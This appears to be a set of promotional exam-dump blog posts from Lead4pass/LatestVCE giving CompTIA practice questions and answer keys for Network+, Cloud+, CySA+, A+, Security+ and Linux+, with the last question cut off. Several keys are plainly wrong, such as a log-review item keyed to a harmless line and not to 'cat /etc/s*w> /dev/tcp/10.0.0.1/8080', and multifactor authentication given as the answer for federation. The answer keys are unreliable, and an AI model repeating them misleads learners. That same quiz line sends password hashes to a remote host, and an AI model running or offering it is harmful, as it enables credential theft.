CompTIA

Studying CompTIA Exam Simulation And Pass CompTIA Rate, Hottest CompTIA Exam Questions And Answers

Provides a valid CompTIA Network+ N10-007 exam dumps | 100% Free

LatestVCE shares online exam exercise questions all year round! CompTIA Network+ N10-007 exam “CompTIA Network+ helps develop a career in IT infrastructure covering troubleshooting, configuring, and managing networks.” https://www.lead4pass.com/n10-007.html (624 Q&As). Continue to study and we provide an updated cisco N10-007 exam practice questions and answers. You can practice the test online!

The latest update of CompTIA N10-007 exam questions and answers

All CompTIA exam questions and answers will be updated throughout the year in braindump4it.com

Watch the CompTIA Network+ N10-007 video tutorial online

Table of Contents:

Latest CompTIA Network+ N10-007 pdf

[PDF] Free CompTIA Network+ N10-007 pdf dumps download from Google Drive: https://drive.google.com/open?id=1rJQW9Ebqvlq8mKmXytaU5Xq0kj2UqFI5

Network+ Certification | CompTIA IT Certifications: https://certification.comptia.org/certifications/network

CompTIA Network+ N10-007 has been updated and reorganized to address the current networking technologies with expanded coverage of several domains by adding:

  • Critical security concepts to helping networking professionals work with security practitioners
  • Key cloud computing best practices and typical service models
  • Coverage of newer hardware and virtualization techniques
  • Concepts to give individuals the combination of skills to keep the network resilient

CompTIA Network+ N10-007 Exam Practice Questions

QUESTION 1
Please refer to the attached exhibit. Which of the following types of configuration management documentation is
represented?lead4pass n10-007 exam question q1

A. Network security policy
B. Network baseline
C. Logical network diagram
D. Wiring schematic
Correct Answer: C

QUESTION 2
Which of the following MUST be used when securing a VoIP network consisting of private IP addresses?
A. IPS
B. Application layer firewall
C. IDS
D. An unmanaged switch
Correct Answer: B

QUESTION 3
A network technician is configuring user\\’s access to a VPN concentrator and has advised to use a protocol that
supports encryption over UDP. Which of the following protocols has the technician MOST likely configured for client
use?
A. TFTP
B. DTLS
C. DNS
D. SNMP
Correct Answer: B

QUESTION 4
A technician is investigating the cause of a network outage. Which of the following documents should be checked to rule
out configuration issues?
A. Change management records
B. Inventory management
C. Network log files
D. Logical diagrams
Correct Answer: A

QUESTION 5
Which of the following default ports would need to be disabled to block TFTP traffic?
A. 20
B. 21
C. 69
D. 123
Correct Answer: C

QUESTION 6
A customer is reporting difficulty connecting some devices after replacing a wireless router with a new wireless
802.11ac router. The SSID, encryption and password are the same as the previous router. A technician goes on-site
and notices the devices that are no longer connecting appear to be several years ago. Which of the following is MOST
likely the problem?
A. the password needs to be re-entered.
B. there is a security type mismatch.
C. there is insufficient antenna power.
D. there is a frequency mismatch.
E. the channel has changed.
Correct Answer: D

QUESTION 7
Which of the following are network topologies? (Select TWO).
A. Ethernet
B. Duplex
C. Star
D. Circular
E. Bus
Correct Answer: CE

QUESTION 8
Which of the following is indicative of an FTP bounce?
A. Arbitrary IP address
B. Reverse DNS lookups
C. Same Port Number
D. File Transfer Success
Correct Answer: A

QUESTION 9
When Jeff, a technician, is troubleshooting a problem, which of the following is the NEXT step after verifying full system
functionality?
A. Establish a plan of action to resolve the problem and identify potential effects.
B. Implement the solution.
C. Establish a theory of probable cause.
D. Document findings, actions, and outcomes.
Correct Answer: D

QUESTION 10
A network technician needs to connect to a remote router to modify the configuration, Which of the following method
should the technician use to connected to the device security? (Select TWO)
A. Telnet
B. VNC
C. SSH
D. RDP
E. HTTPS
F. TFTP
Correct Answer: BC

QUESTION 11
A technician is installing a new wireless badging system on a hospital network. The requirements of the badging system
are for it to have its own SSID and low power levels. The badging system has to cover 99.9% of the hospital. Which of
the following is the BEST action to take to meet the system requirements?
A. Install additional WAPs
B. Install external antennas
C. Move the WAPs closer to the more populated area
D. Change the antenna types
Correct Answer: A

QUESTION 12
There is suspected virus activity on the network. Which of the following would Lisa, a technician, use to study network
traffic?
A. Protocol analyzer
B. Cable tester
C. Cable certifier
D. Environmental monitor
Correct Answer: A

QUESTION 13
A firewall administrator is implementing a rule that directs HTTP traffic to an internal server listening on a non-standard
socket. Which of the following types of rules is the administrator implementing?
A. NAT
B. PAT
C. STP
D. SNAT
E. ARP
Correct Answer: B

Related N10-007 Popular Exam resources

title pdf youtube CompTIA lead4pass Lead4Pass Total Questions
CompTIA Network+ lead4pass N10-007 dumps pdf lead4pass N10-007 youtube CompTIA Network+ https://www.lead4pass.com/n10-007.html 624 Q&A
lead4pass n10-006 dumps pdf lead4pass n10-006 youtube   https://www.lead4pass.com/n10-006.html 1703 Q&A

Get Lead4Pass Coupons(12% OFF)

lead4pass coupon

What are the advantages of Lead4pass?

We have a number of CompTIA, CompTIA, IBM, CompTIA, and other exam experts. We update exam data throughout the year.
Top exam pass rate! We have a large user base. We are an industry leader! Choose Lead4Pass to pass the exam with ease!

about lead4pass

Summarize:

The free CompTIA Network+ N10-007 exam dumps can help you improve your skills and exam experience! To pass the cisco N10-007 exam at once: https://www.lead4pass.com/n10-007.html We make CompTIA N10-007 videos and N10-007 pdf for you to learn! I hope you can pass the exam easily.

[2021.1] Free CompTIA CV0-002 exam practice test and latest updates CV0-002 dumps from Lead4pass

Newly shared CompTIA CV0-002 exam learning preparation program! Get the latest CV0-002 exam exercise questions and exam dumps pdf for free! 100% pass the exam to select
the full CompTIA CV0-002 dumps https://www.lead4pass.com/cv0-002.html the link to get VCE or PDF. All exam questions are updated!

Lead4pass offers the latest CompTIA CV0-002 PDF Google Drive

[Latest updates] Free CompTIA CV0-002 dumps pdf download from Google Drive: https://drive.google.com/file/d/1yTSpRRQYWwCiOMiah9zAQuAoKOeH7loQ/

Latestvce Exam Table of Contents:

CompTIA CV0-002 Practice testing questions from Youtube

https://youtube.com/watch?v=j6rpjosrDmQ

latest updated CompTIA CV0-002 exam questions and answers

QUESTION 1
A company has just completed a security audit and received initial results from the auditor. The results show that the
ethical hacker was able to gain access to the company servers by exploiting non-hardened VMs and hosts as guests
and administrators. Which of the following should be implemented to harden the environment? (Select two.)
A. Discretionary access controls
B. Disable unnecessary accounts
C. Change default passwords
D. Install antivirus software
E. Role-based access controls
Correct Answer: BE

 

QUESTION 2
Which of the following is the BEST method to isolate iSCSI network traffic?
A. WWPN Zoning
B. WWNN Zoning
C. Dedicated VLANs
D. LUN Masking
Correct Answer: C

 

QUESTION 3
Which of the following protocols allows fibre channel to be transmitted over the network?
A. HBA
B. FCoE
C. NFS
D. iSCSI
Correct Answer: B

 

QUESTION 4
A system administrator found that a user repeatedly violates acceptable use policies by consuming more disk space
than the user is authorized to consume. Which of the following tools should the administrator use to enforce the
acceptable use policy?
A. Quotas
B. Resource pools
C. LUN masking
D. Reservations
Correct Answer: A

 

QUESTION 5
Cloud bursting can alleviate which of the following attacks?
A. Buffer Overflow
B. Brute Force
C. XSS
D. DDOS
Correct Answer: D
http://ieeexplore.ieee.org/document/6141288/

 

QUESTION 6
A company that provides cloud-based storage services allows user authentication using third-party social network
credentials. Which of the following should be implemented to accomplish this task?
A. Multifactor authentication
B. Virtual private network
C. Federation D. Domain trusts
Correct Answer: A

 

QUESTION 7
A cloud administrator needs to configure multiple web servers to participate actively in workload processing. Which of
the following will BEST help the administrator achieve this goal?
A. Deploy availability group and enable autoscaling.
B. Deploy availability group and enable load balancing.
C. Deploy a reverse proxy in the DMZ.
D. Deploy an HA group and make each website public.
Correct Answer: B

 

QUESTION 8
A new SaaS timecard application that is being tested will be used by all employees at a large corporation. The following
process was used to test the application:
1.
Three users from each site used the application for three weeks.
2.
The new application was used side by side with the existing application.
3.
The outputs of the old and new applications were compared side by side.
Which of the following requirements did the testing plan confirm? (Select two.)
A. High availability
B. Performance
C. Connectivity
D. Data integrity
E. Sizing
F. Security
Correct Answer: BDE

 

QUESTION 9
A company has decided to scale its e-commerce application from its corporate datacenter to a commercial cloud
provider to meet an anticipated increase in demand during an upcoming holiday. The majority of the application load
takes place on the application server under normal conditions. For this reason, the company decides to deploy
additional application servers into a commercial cloud provider using the on-premises orchestration engine that installs
and configures common software and network configurations. The remote computing environment is connected to the
on-premises datacenter via a site-to-site IPSec tunnel. The external DNS provider has been configured to use weighted
round-robin routing to load balance connections from the Internet.
During testing, the company discovers that only 20% of connections completed successfully.
Review the network architecture and supporting documents and fulfill these requirements: Identify the correct options to
provide adequate configuration for hybrid cloud architecture.
Instructions:
If at any time you would like to bring back the initial state of the simulation, please select the Reset button. When you
have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select
the Next button to continue.
Simulation[2021.1] lead4pass cv0-002 exam questions q9 [2021.1] lead4pass cv0-002 exam questions q9-1 [2021.1] lead4pass cv0-002 exam questions q9-2 [2021.1] lead4pass cv0-002 exam questions q9-3 [2021.1] lead4pass cv0-002 exam questions q9-4 [2021.1] lead4pass cv0-002 exam questions q9-5 [2021.1] lead4pass cv0-002 exam questions q9-6

Instruction: Only select a maximum of TWO options from the multiple-choice question.
A. Deploy a Replica of the Database Server in the Cloud Provider
B. Update the PSK (Pre-shared key in Router2)
C. Update the A record on the DNS from 2.2.2.2 to 1.1.1.1
D. Promote deny All to allow All in Firewall1 and Firewall2
E. Change the Address Space on Router2
F. Change internal IP Address of Router1
G. Reverse the Weight property in the two CNAME records on the DNS
H. Add the Application Server at on-premises to the Load Balancer
Correct Answer: AH

 

QUESTION 10
A hypervisor that prevents vendor lock-in is:
A. a proprietary hypervisor.
B. an integrated hypervisor.
C. an open-source hypervisor.
D. a framework hypervisor.
Correct Answer: C

 

QUESTION 11
A cloud provider is evaluating an insider threat. A resource from the company operations team has access to the
servers\\’ virtual disks. This poses a risk that someone could copy and move the virtual server image and have access
to the data. Which of the following solutions would help mitigate this problem?
A. Tokenization
B. Encryption
C. Virtual firewall
D. Hashing
Correct Answer: A

 

QUESTION 12
The fault-tolerant design allows a host to overcome a single HBA failure through:
A. clustering
B. UTA pairing
C. multipathing
D. NIC teaming
Correct Answer: A
http://www.ques10.com/p/2619/write-short-note-on-failure-analysis/

 

QUESTION 13
A company has a private cloud NAC solution in place to prevent unauthorized/non-company assets from connecting to
the internal network. A cloud systems administrator cannot add a new physical server to the existing functioning cluster.
Which of the following is the MOST likely cause of this issue?
A. Server objects were deleted.
B. The DNS and DHCP servers are down.
C. The new physical server has a faulty NIC.
D. Server MAC addresses are not being updated.
Correct Answer: A

Lead4Pass CompTIA Discount code 2021

Lead4pass shares the latest CompTIA exam Discount code “CompTIA“. Enter the Discount code to get a 15% Discount!

About lead4pass

Lead4Pass has 8 years of exam experience! A number of professional CompTIA exam experts! Update exam questions throughout the year! The most complete exam questions and answers! The safest buying experience! The greatest free sharing of exam practice questions and answers!
Our goal is to help more people pass the CompTIA exam! Exams are a part of life, but they are important!
In the study, you need to sum up the study! Trust Lead4Pass to help you pass the exam 100%!
about lead4pass

Summarize:

Latestvce free to share CompTIA CV0-002 exam exercise questions, CV0-002 pdf, CV0-002 exam video! Lead4pass updated exam questions and answers throughout the year!
Make sure you pass the exam successfully. Select lead4Pass CV0-002 to pass CompTIA CV0-002 exam “CompTIA Cloud+ Certification Exam certification dumps“.

ps.

Latest update Lead4pass CV0-002 exam dumps: https://www.lead4pass.com/cv0-002.html (434 Q&As)

[Latest updates] Free CompTIA CV0-002 Dumps pdf download from Google Drive: https://drive.google.com/file/d/1yTSpRRQYWwCiOMiah9zAQuAoKOeH7loQ/

[2021.1] Free CompTIA CS0-002 exam practice test and latest updates CS0-002 dumps from Lead4pass

Newly shared CompTIA CS0-002 exam learning preparation program! Get the latest CS0-002 exam exercise questions and exam dumps pdf for free! 100% pass the exam to select
the full CompTIA CS0-002 dumps https://www.lead4pass.com/cs0-002.html the link to get VCE or PDF. All exam questions are updated!

Lead4pass offers the latest CompTIA CS0-002 PDF Google Drive

[Latest updates] Free CompTIA CS0-002 dumps pdf download from Google Drive: https://drive.google.com/file/d/1mdnbpMzHdIDd6PEWbNVg2Qddz1HyYBav/

Latestvce Exam Table of Contents:

CompTIA CS0-002 Practice testing questions from Youtube

https://youtube.com/watch?v=ZEL5kaPH2Zw

latest updated CompTIA CS0-002 exam questions and answers

QUESTION 1
During an investigation, an incident responder intends to recover multiple pieces of digital media. Before removing the
media, the responder should initiate:
A. malware scans.
B. secure communications.
C. chain of custody forms.
D. decryption tools.
Correct Answer: C

 

QUESTION 2
An analyst is performing penetration testing and vulnerability assessment activities against a new vehicle automation
platform. Which of the following is MOST likely an attack vector that is being utilized as part of the testing and
assessment?
A. FaaS
B. RTOS
C. SoC
D. GPS
E. CAN bus
Correct Answer: B
IoT devices also often run real-time operating systems (RTOS). These are either special purpose operating systems or
variants of standard operating systems designed to process data rapidly as it arrives from sensors or other IoT
components.

 

QUESTION 3
An analyst identifies multiple instances of node-to-node communication between several endpoints within the
10.200.2.0/24 network and a user machine at the IP address 10.200.2.5. This user machine at the IP address
10.200.2.5 is also identified as initiating outbound communication during atypical business hours with several IP
addresses that have recently appeared on threat feeds.
Which of the following can be inferred from this activity?
A. 10.200.2.0/24 is infected with ransomware.
B. 10.200.2.0/24 is not routable address space.
C. 10.200.2.5 is a rogue endpoint.
D. 10.200.2.5 is exfiltrating data.
Correct Answer: D

 

QUESTION 4
A cybersecurity analyst has access to several threat feeds and wants to organize them while simultaneously comparing
intelligence against network traffic. Which of the following would BEST accomplish this goal?
A. Continuous integration and deployment
B. Automation and orchestration
C. Static and dynamic analysis
D. Information sharing and analysis
Correct Answer: C

 

QUESTION 5
Which of the following MOST accurately describes an HSM?
A. An HSM is a low-cost solution for encryption.
B. An HSM can be networked based or a removable USB
C. An HSM is slower at encrypting than software
D. An HSM is explicitly used for MFA
Correct Answer: A

 

QUESTION 6
A security analyst has a sample of malicious software and needs to know what the sample does? The analyst runs the
sample in a carefully controlled and monitored virtual machine to observe the software behavior. Which of the following
malware analysis approaches is this?
A. White box testing
B. Fuzzing
C. Sandboxing
D. Static code analysis
Correct Answer: C


QUESTION 7
A Chief Information Security Officer (CISO) is concerned the development team, which consists of contractors, has too
much access to customer data. Developers use personal workstations, giving the company little to no visibility into the
development activities.
Which of the following would be BEST to implement to alleviate the CISO\\’s concern?
A. DLP
B. Encryption
C. Test data
D. NDA
Correct Answer: A

 

QUESTION 8
Data spillage occurred when an employee accidentally emailed a sensitive file to an external recipient. Which of the
following controls would have MOST likely prevented this incident?
A. SSO
B. DLP
C. WAF
D. VDI
Correct Answer: B
Reference: https://greenlightcorp.com/blog/cyber-security-solutions-data-spillage-and-how-to-create-an-after-incident-todo-list/

 

QUESTION 9
A security analyst recently discovered two unauthorized hosts on the campus\\’s wireless network segment from a manm-the-middle attack.The security analyst also verified that privileges were not escalated, and the two devices did not
gain access to other network devices Which of the following would BEST mitigate and improve the security posture of
the wireless network for this type of attack?
A. Enable MAC filtering on the wireless router and suggest stronger encryption for the wireless network,
B. Change the SSID, strengthen the passcode, and implement MAC filtering on the wireless router.
C. Enable MAC filtering on the wireless router and create a whitelist that allows devices on the network
D. Conduct a wireless survey to determine if the wireless strength needs to be reduced.
Correct Answer: A


QUESTION 10
A system is experiencing noticeably slow response times, and users are being locked out frequently. An analyst asked
for the system security plan and found the system comprises two servers: an application server in the DMZ and a
database server inside the trusted domain. Which of the following should be performed NEXT to investigate the
availability issue?
A. Review of the firewall logs.
B. Review syslogs from critical servers.
C. Perform fuzzing.
D. Install a WAF in front of the application server.
Correct Answer: C

 

QUESTION 11
A security team is implementing a new vulnerability management program in an environment that has a historically poor
security posture. The team is aware of issues patch management in the environment and expects a large number of
findings. Which of the following would be the MOST efficient way to increase the security posture of the organization in
the shortest amount of time?
A. Create an SLA stating that remediation actions must occur within 30 days of discovery for all levels of vulnerabilities.
B. Incorporate prioritization levels into the remediation process and address critical findings first.
C. Create classification criteria for data residing on different servers and provide remediation only for servers housing
sensitive data.
D. Implement a change control policy that allows the security team to quickly deploy patches in the production
environment to reduce the risk of any vulnerabilities found.
Correct Answer: B

 

QUESTION 12
An information security analyst observes anomalous behavior on the SCADA devices in a power plant. This behavior
results in the industrial generators overheating and destabilizing the power supply. Which of the following would BEST
identify potential indicators of compromise?
A. Use Burp Suite to capture packets to the SCADA device\\’s IP.
B. Use tcpdump to capture packets from the SCADA device IP.
C. Use Wireshark to capture packets between SCADA devices and the management system.
D. Use Nmap to capture packets from the management system to the SCADA devices.
Correct Answer: C


QUESTION 13
During a routine log review, a security analyst has found the following commands that cannot be identified from the
Bash history log on the root user.
1.
Line 1 logger keeping track of my activity
2.
Line 2 tail -l /vvar/log/syslog
3.
Lino 3 lvextend -L +50G /dev/volg1/secret
4.
Line 4 rm -rf1 /tmp/DFt5Gsd3
5.
Line 5 cat /etc/s*w> /dev/tcp/10.0.0.1/8080
6.
Line 6 yum install httpd –assumeyes
Which of the following commands should the analyst investigate FIRST?
A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6
Correct Answer: B

Lead4Pass CompTIA Discount code 2021

Lead4pass shares the latest CompTIA exam Discount code “CompTIA“. Enter the Discount code to get a 15% Discount!

About lead4pass

Lead4Pass has 8 years of exam experience! A number of professional CompTIA exam experts! Update exam questions throughout the year! The most complete exam questions and answers! The safest buying experience! The greatest free sharing of exam practice questions and answers!
Our goal is to help more people pass the CompTIA exam! Exams are a part of life, but they are important!
In the study, you need to sum up the study! Trust Lead4Pass to help you pass the exam 100%!
about lead4pass

Summarize:

Latestvce free to share CompTIA CS0-002 exam exercise questions, CS0-002 pdf, CS0-002 exam video! Lead4pass updated exam questions and answers throughout the year!
Make sure you pass the exam successfully. Select lead4Pass CS0-002 to pass CompTIA CS0-002 exam “CompTIA Cybersecurity Analyst (CySA+) certification dumps“.

ps.

Latest update Lead4pass CS0-002 exam dumps: https://www.lead4pass.com/cs0-002.html (186 Q&As)

[Latest updates] Free CompTIA CS0-002 Dumps pdf download from Google Drive: https://drive.google.com/file/d/1mdnbpMzHdIDd6PEWbNVg2Qddz1HyYBav/

Lead4Pass shares the latest CompTIA 220-1002 dumps questions and exam tips

Lead4Pass has updated CompTIA 220-1002 dumps issues! The latest 220-1002 exam questions can help you pass the exam! All questions are corrected to ensure authenticity and effectiveness! Download the Lead4Pass 220-1002 VCE dumps or PDF dumps: https://www.lead4pass.com/220-1002.html (Total Questions: 374 Q&A 220-1002 Dumps)

CompTIA 220-1002 Practice testing questions from Youtbe

https://youtube.com/watch?v=mmVOJvr0PKc

Latestvce Exam Table of Contents:

Latest CompTIA 220-1002 google drive

[PDF] Free CompTIA 220-1002 pdf dumps download from Google Drive: https://drive.google.com/file/d/1-jDbooYqCbzjl1qAhnBBzAEaRGKiLtLi/

Latest updates CompTIA 220-1002 exam practice questions

QUESTION 1
A small business has an open WiFi network for employees but does not want customers to connect to the access point.
A technician has been dispatched to address the business\\’s concerns. Which of the following configuration settings
should the technician change to satisfy the requirements of the business? (Select two.)
A. Default SSID
B. MAC filtering
C. NAT
D. QoS
E. Signal strength
F. Encryption
Correct Answer: BE

 

QUESTION 2
A small office calls a technician to investigate some “invalid certificate” errors from a concerned user. The technician
observes that whenever the user to access a secure website from the Windows desktop, this error is encountered. No
other users in the office are experiencing this error.
Which of the following should the technician do NEXT? (Choose two.)
A. Remove any proxy servers configured on the user\\’s browsers.
B. Assist the user with purchasing an SSL certificate and save the certificate to the desktop.
C. Disable the SPI firewall on the office\\’s gateway and any other routers.
D. Instruct the user to ignore the certificate error since the user is connecting to a secure website.
E. Create an outbound rule in Windows Firewall named after the user\\’s homepage.
F. Run anti-malware scans and downloads the latest Windows updates.
Correct Answer: AF

 

QUESTION 3
A technician has been dispatched to resolve a malware problem on a user\\’s workstation. The antivirus program
discovered several hundred potential malware items on the workstation and removed them successfully. The technician
decides to schedule daily scans on the system, enables System Restore, and creates a restore point. Which of the
following should the technician do NEXT?
A. Run the scan again to ensure all malware has been removed
B. Quarantine the infected workstation from the network
C. Install all of the latest Windows Updates to patch the system
D. Educate the user on safe browsing practices
Correct Answer: C

 

QUESTION 4
A user\\’s computer is suspected of hosting illegal files. The IT department has removed the computer and placed it in a
secured, cypher-locked room, where it will remain until the local authorities arrive. Which of the following actions should
the IT department perform NEXT?
A. Preserve data integrity
B. Identify violations of acceptable use
C. Collect evidence of illegal activity
D. Report through proper channels
Correct Answer: A

 

QUESTION 5
A MAC user\\’s operating system became corrupted, and files were deleted after malware was downloaded. The user
needs to access the data that was previously stored on the MAC. Which of the following built-in utilities should be
used?
A. Time Machine
B. Snapshot
C. System Restore
D. Boot Camp
Correct Answer: A

 

QUESTION 6
A Windows user reports that at system startup and when certain programs are launched a computer displays a message that says several .dll files are missing. Which of the following should a technician do to attempt to restore the
missing system files?
A. Run the SFC utility.
B. Use MSConfig.
C. Use Computer Management.
D. Runregsrv32.
Correct Answer: C

 

QUESTION 7
When setting up new Windows PCs m a mixed network environment with Mac OS X, which of the following file system
types would enable users to read and write data to USB flash drives from either OS without modifications?
A. CDFS
B. ext4
C. exFAT
D. ext3
Correct Answer: C

 

QUESTION 8
A client wants a technician to create a PC naming convention that will make the client\\’s PCs easier to track and identify
while in use. Which of the following naming convention formats should the technician follow?
A. Domain name, location, IP address
B. Domain name, location, asset ID
C. Asset ID, MAC address
D. Location, RFID
Correct Answer: C

 

QUESTION 9
A user reports slow performance on a computer. A technician checks the computer and finds the RAM utilization Is very
high. The technician restarts the computer, and the RAM use is still high. The technician discovers a program running in
the background Is using most of the RAM. The user only uses this program once at the end of the year to produce a
report. Which of the following steps should the technician take to improve the computer\\’s performance?
A. Uninstall and reinstall the program.
B. Perform a repair installation of the program
C. Install the latest updates for the program.
D. Disable the program on startup.
Correct Answer: A


QUESTION 10
Which of the following is the BEST way to get rid of dead pixels on a laptop screen?
A. Replace the inverter
B. Replace the back bezel
C. Replace backlight
D. Replace the LCD
Correct Answer: D
Reference: http://www.notebookreview.com/default.asp?newsID=2211

 

QUESTION 11
A customer has a Linux desktop and is installing a 3TB HDD. The customer wants to use only half of its capacity right now but would like to be able to increase the size of the partition at a later date. Which of the following filesystem types
would the customer\\’s drive require?
A. NTFS
B. Ext4
C. HFS
D. FAT32
Correct Answer: B

 

QUESTION 12
A user is having difficulty installing a program in Windows Vista, as the computer appears to stall prior to the installation.
Which of the following is the BEST choice of why this is occurring?
A. Aero Settings are not enabled.
B. Power Settings need to be enabled.
C. BitLocker is scanning for corrupt software.
D. UAC is waiting for user input.
Correct Answer: D

 

QUESTION 13
A technician is working on a consumer computer that has multiple virus infections. The end-user states that all of their
data documents are stored on a backup drive. Which of the following methods are commonly available to do a clean
install and return the computer back to the factory condition? (Select TWO).
A. Upgrade installation disc
B. Repair installation
C. Factory recovery partition
D. OS installation disc
E. Remote network installation
Correct Answer: CD

Latest Lead4Pass CompTIA dumps Discount Code 2020

lead4pass coupon 2020

About The Lead4Pass Dumps Advantage

Lead4Pass has 7 years of exam experience! A number of professional CompTIA exam experts! Update exam questions throughout the year! The most complete exam questions and answers! The safest buying experience! The greatest free sharing of exam practice questions and answers!
Our goal is to help more people pass the CompTIA exam! Exams are a part of life, but they are important! In the study, you need to sum up the study! Trust Lead4Pass to help you pass the exam 100%!
about lead4pass

Summarize:

This blog shares the latest CompTIA 220-1002 exam dumps, 220-1002 exam questions and answers! 220-1002 pdf, 220-1002 exam video!
You can also practice the test online! Lead4pass is the industry leader!
Select Lead4Pass 220-1002 exams Pass CompTIA 220-1002 exams “CompTIA A+ Certification Exam: Core 2”. Help you successfully pass the 220-1002 exam.

ps.

Get CompTIA Full Series Exam Dumps: https://www.fulldumps.com/?s=CompTIA (Updated daily)
Get Lead4Pass CompTIA A+ exam dumps: https://www.lead4pass.com/comptia-a-.html
Latest update Lead4pass 220-1002 exam dumps: https://www.lead4pass.com/220-1002.html (374 Q&As)
[Q1-Q12 PDF] Free CompTIA 220-1002 pdf dumps download from Google Drive: https://drive.google.com/file/d/1-jDbooYqCbzjl1qAhnBBzAEaRGKiLtLi/

Latest CompTIA SY0-401 Exam Practice Questions And Answers Free Download

Vendor: CompTIA
Exam Code: SY0-401 exam
Exam Name: CompTIA Security+ Certification Exam
Version: Demo

sy0-401

QUESTION 1
A security administrator is notified that users attached to a particular switch are having intermittent connectivity issues. Upon further research, the administrator finds evidence of an ARP spoofing attack. Which of the following could be SY0-401 utilized to provide protection from this type of attack?
A. Configure MAC filtering on the switch.
B. Configure loop protection on the switch.
C. Configure flood guards on the switch.
D. Configure 802.1x authentication on the switch.
Correct Answer: C Explanation

QUESTION 2
Ann is a member of the SY0-401 vce Sales group. She needs to collaborate with Joe, a member of the IT group, to edit a file. Currently, the file has the following permissions: Ann: read/write
Sales Group: read
IT Group: no access
If a discretionary access control list is in place for the files owned by Ann, which of the following would be the BEST way to share the file with Joe?
A. Add Joe to the Sales group.
B. Have the system administrator give Joe full access to the file.
C. Give Joe the appropriate access to the file directly.
D. Remove Joe from the IT group and add him to the Sales group.
Correct Answer: C Explanation

QUESTION 3
A company would like to take electronic orders from a partner; however, they are concerned that a non-authorized person may send an order. The legal department asks if there is a solution that SY0-401 provides non-repudiation. Which of the following would meet the requirements of this scenario?
A. Encryption
B. Digital signatures
C. Steganography
D. Hashing
E. Perfect forward secrecy
Correct Answer: B Explanation

QUESTION 4
The Chief Security Officer (CSO) is contacted by a first responder. The SY0-401 pdf CSO assigns a handler. Which of the following is occurring?
A. Unannounced audit response
B. Incident response process
C. Business continuity planning
D. Unified threat management
E. Disaster recovery process
Correct Answer: B Explanation

QUESTION 5
An organization must implement controls to protect the confidentiality of its most sensitive data. The company is currently using a central storage system and group based access control for its sensitive information. Which of the following controls can further secure the data in the central storage system?
A. Data encryption
B. Patching the system
C. Digital signatures
D. File hashing
Correct Answer: A Explanation

QUESTION 6
A network administrator, Joe, arrives at SY0-401 his new job to find that none of the users have changed their network passwords since they were initially hired. Joe wants to have everyone change their passwords immediately. Which of the following policies should be enforced to initiate a password change?
A. Password expiration
B. Password reuse
C. Password recovery
D. Password disablement
Correct Answer: A Explanation

QUESTION 7
Ann, a security administrator at a call center, has been experiencing problems with users intentionally installing unapproved and occasionally malicious software on their computers. Due to the SY0-401 dumps nature of their jobs, Ann cannot change their permissions. Which of the following would BEST alleviate her concerns?
A. Deploy a HIDS suite on the users’ computers to prevent application installation.
B. Maintain the baseline posture at the highest OS patch level.
C. Enable the pop-up blockers on the users’ browsers to prevent malware.
D. Create an approved application list and block anything not on it.
Correct Answer: D Explanation

QUESTION 8
Which of the SY0-401 following should be used to authenticate and log connections from wireless users connecting with EAP-TLS?
A. Kerberos
B. LDAP
C. SAML
D. RADIUS
Correct Answer: D Explanation

Read more:Pass CompTIA https://www.lead4pass.com/sy0-401.html exam test quickly and easily with best CompTIA SY0-401 exam study materials online.

Related: https://www.latestvce.com/cisco-200-125-exam-pdf/

Watch the video to learn more:

https://youtu.be/wtR1V8gIc_8

Provides a valid CompTIA Linux+ Powered by LPI LX0-104 exam dumps | 100% Free

LatestVCE shares online exam exercise questions all year round! CompTIA Linux+ Powered by LPI LX0-104 exam “CompTIA Linux+ validates the competencies required of an early career system administrator supporting Linux systems” https://www.lead4pass.com/lx0-104.html (178 Q&As).Continue to study and we provide an updated cisco LX0-104 exam practice questions and answers. You can practice the test online!

Watch the CompTIA Linux+ Powered by LPI LX0-104 video tutorial online

Table of Contents:

Latest CompTIA Linux+ Powered by LPI LX0-104 pdf

[PDF] Free CompTIA Linux+ Powered by LPI LX0-104 pdf dumps download from Google Drive: https://drive.google.com/open?id=1ZmaRmlqueXHozr0htP1cSC8ddzpQPZq5

LX0-104 – CompTIA IT Certifications: https://certification.comptia.org/docs/default-source/exam-objectives/comptia-linux-powered-by-lpi-(lx0-104).pdf?sfvrsn=c3bfde36_6

Linux+ (Plus) Certification | CompTIA IT Certifications:https://certification.comptia.org/certifications/linux

CompTIA Linux+ covers common tasks in major distributions of Linux, including the Linux command line, basic maintenance, installing and configuring workstations, and networking. Linux+ is comprised of two exams – LX0-103 and LX0-104. Candidates must pass LX0-103 before taking LX0-104.

XK0-004: https://www.lead4pass.com/xk0-004.html

CompTIA Linux+ validates the skills of IT professionals with hands-on experience configuring, monitoring, and supporting servers running the Linux operating system. The new exam has an increased focus on the following topics: security, kernel modules, storage & visualization, device management at an enterprise level, git & automation, networking & firewalls, server-side & command line, server (vs. client-based) coverage, troubleshooting, and SELinux.

CompTIA Linux+ Powered by LPI LX0-104 Exam Practice Questions

QUESTION 1
Instead of using specific host names or IP addresses, which string can be used in /etc/hosts.allow entries to cover any
remote host no matter of its name or address? (Specify the relevant string only without any additional options or
arguments.)
A. all
Correct Answer: A

QUESTION 2
What is the name of the simple graphical login manager that comes with a vanilla X11 installation? (Specify ONLY the
command without any path or parameters.)
A. xdm
Correct Answer: A

QUESTION 3
What word will complete an if statement in bash such as the following: if [ -x “$file” ]; then echo $file _____ (Please
provide the missing word only)
Correct Answer: fi

QUESTION 4
Which of the following crontab entries will execute myscript at 30 minutes past every hour on Sundays?
A. 0 * * * 30 myscript
B. 30 * * * 6 myscript
C. 30 0 * * 0 myscript
D. 30 0-23 * * 0 myscript
E. 0 0-23 * * 30 myscript
Correct Answer: D

QUESTION 5
Which of the following are commonly used Mail Transfer Agent (MTA) applications? (Choose THREE correct answers.)
A. Postfix
B. Procmail
C. Sendmail
D. Exim
E. SMTPd
Correct Answer: ACD

QUESTION 6
Which of the following is a correct entry in the /etc/hosts file?
A. localhost 127.0.0.1 localhost.localdomain localhost 127.0.0.1
B. localhost.localdomain
C. localhost localhost.localdomain 127.0.0.1
D. 127.0.0.1 localhost.localdomain localhost
127.0.0.1 localhost
E. localhost.localdomain
Correct Answer: D

QUESTION 7
Which port is the default server port for the HTTPS protocol? (Specify the port number using digits.)
Correct Answer: 443

QUESTION 8
Which of the following files holds the configuration for journald when running system?
A. /etc/system/journalctl.conf
B. /etc/systemd/journald.conf
C. /etc/system/systemd-journal.conf
D. /etc/systemd/systemd-journalctl.conf
E. /usr/lib/systemd/journalctl.conf
Correct Answer: B

QUESTION 9
After adding a new email alias to the configuration, which command must be run in order to ensure the MTA knows
about it? (Specify the command without any path but including all required parameters.)
